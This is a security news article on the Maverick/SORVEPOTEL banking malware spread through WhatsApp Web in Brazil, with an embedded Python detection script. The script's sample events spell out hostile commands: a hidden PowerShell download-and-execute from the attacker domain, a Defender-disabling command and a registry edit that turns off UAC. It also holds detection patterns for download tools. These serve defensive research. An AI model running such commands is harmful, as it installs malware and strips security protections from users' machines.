WhatsApp Malware Hijacks Browser Sessions in Major Bank Attack

Threat hunters have seen parallels between a recently revealed harmful program called Maverick that has spread via WhatsApp and a banking trojan known as Coyote.

Both malware variants are built in .NET, target Brazilian banks and users, and share the same decryption routine, banking-URL targeting, and banking-application monitoring capabilities, according to a CyberProof investigation. More significantly, both have the capacity to propagate via WhatsApp Web.

Trend Micro first reported Maverick early last month, linking it to a threat actor known as Water Saci. The campaign has two components: SORVEPOTEL, a self-propagating malware that spreads through WhatsApp’s desktop browser version (WhatsApp Web), delivers a ZIP archive that contains the Maverick payload.

The malware’s purpose is to monitor open browser tabs for URLs that match a hard-coded list of Latin American financial institutions. When a URL matches, it connects to a remote server to retrieve further commands, collects system data, and serves phishing pages to harvest login credentials.

In a later investigation, cybersecurity company Sophos was the first to question whether Maverick is an evolution of Coyote and whether the behavior might be connected to previously documented operations that spread Coyote to users in Brazil.

A separate Kaspersky investigation found that Maverick and Coyote share a large amount of code, but it treats Maverick as a brand-new threat targeting Brazil.

According to CyberProof’s most recent research, the ZIP package contains a Windows shortcut (LNK) which, when opened by the user, starts PowerShell or cmd.exe to connect to an external server (“zapgrande[.]com”) and download the first-stage payload.

The PowerShell script can fetch a .NET loader and launch intermediate tools intended to disable Microsoft Defender Antivirus and UAC.
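The delivery chain described above (an LNK opened from Explorer spawning PowerShell or cmd.exe, a download from the external server, and follow-on tampering with Defender or UAC) maps cleanly onto process-creation telemetry. The following is an added detection example written for this article, not code from CyberProof, Trend Micro, or the malware itself. The event shape, rule names, cue regexes and sample events are all assumptions constructed for illustration; the only indicator taken from the article is the zapgrande[.]com domain, which is written defanged there.

```python
"""Added example: flag process-creation events that match the Maverick/SORVEPOTEL
delivery chain described in the article. Sample events are constructed, not real
telemetry; only the zapgrande[.]com domain comes from the article."""
import re
from dataclasses import dataclass


def refang(domain: str) -> str:
    """Turn an article-style defanged indicator (zapgrande[.]com) into a matchable hostname."""
    return domain.replace("[.]", ".").lower()


# Domain indicator from the article (defanged there as zapgrande[.]com).
IOC_DOMAINS = {refang("zapgrande[.]com")}


@dataclass
class ProcEvent:
    """Hypothetical process-creation record shaped like a Sysmon Event ID 1 event."""
    parent_image: str
    image: str
    command_line: str


# Assumed heuristic cues; these are generic detection patterns, not signatures from the article.
DOWNLOAD_CUES = re.compile(
    r"(Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Net\.WebClient|"
    r"Invoke-RestMethod|\bcurl\b|certutil.*-urlcache|bitsadmin)", re.I)
DEFENDER_CUES = re.compile(r"(Set-MpPreference|Add-MpPreference|DisableRealtimeMonitoring)", re.I)
UAC_CUES = re.compile(r"EnableLUA|ConsentPromptBehaviorAdmin", re.I)
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(ev: ProcEvent) -> list[str]:
    """Return the names of every rule the event triggers (empty list if nothing fired)."""
    hits = []
    child = _basename(ev.image)
    parent = _basename(ev.parent_image)
    cmd = ev.command_line
    # Stage 1: a user double-clicks the LNK, so Explorer is the parent of the shell that fetches the payload.
    if child in SHELLS and parent == "explorer.exe" and DOWNLOAD_CUES.search(cmd):
        hits.append("explorer_spawned_shell_downloader")
    # Any command line that references the article's C2 domain, regardless of process.
    for host in URL_RE.findall(cmd):
        if host.lower() in IOC_DOMAINS:
            hits.append("known_c2_domain")
            break
    # Follow-on stages: tools that weaken Defender or UAC.
    if child in SHELLS and DEFENDER_CUES.search(cmd):
        hits.append("defender_tampering")
    if UAC_CUES.search(cmd):
        hits.append("uac_tampering")
    return hits


# Constructed sample events (not real telemetry). Event 3 is a benign control case.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -c \"IEX((New-Object Net.WebClient).DownloadString('http://zapgrande.com/stage1'))\""),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -c \"Set-MpPreference -DisableRealtimeMonitoring $true\""),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\reg.exe",
              "reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f"),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoProfile -File C:\\Users\\alice\\scripts\\backup.ps1"),
]


def scan(events) -> dict[int, list[str]]:
    """Map event index -> triggered rules, for every event that fired at least one rule."""
    return {i: h for i, ev in enumerate(events) if (h := classify(ev))}


if __name__ == "__main__":
    for i, rules in scan(SAMPLE_EVENTS).items():
        print(f"event {i}: {', '.join(rules)}")
```

The first rule is deliberately narrow (Explorer parent plus a download cue) so that ordinary scripts launched from shortcuts, like the benign fourth event, do not fire; the domain match and the tampering rules are independent of the parent so they still catch later stages spawned by the loader rather than by Explorer.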

For its part, the loader uses anti-analysis methods to detect the presence of reverse engineering tools and, if any are found, self-terminates. The attack’s primary modules, SORVEPOTEL and Maverick, are subsequently downloaded by the loader.

It’s important to note that Maverick is only installed after confirming that the victim is in Brazil by examining the infected host’s time zone, language, region, date, and time format.

Additionally, CyberProof reported that it found indications of the malware being used to target specific hotels in Brazil, suggesting a possible expansion of targeting.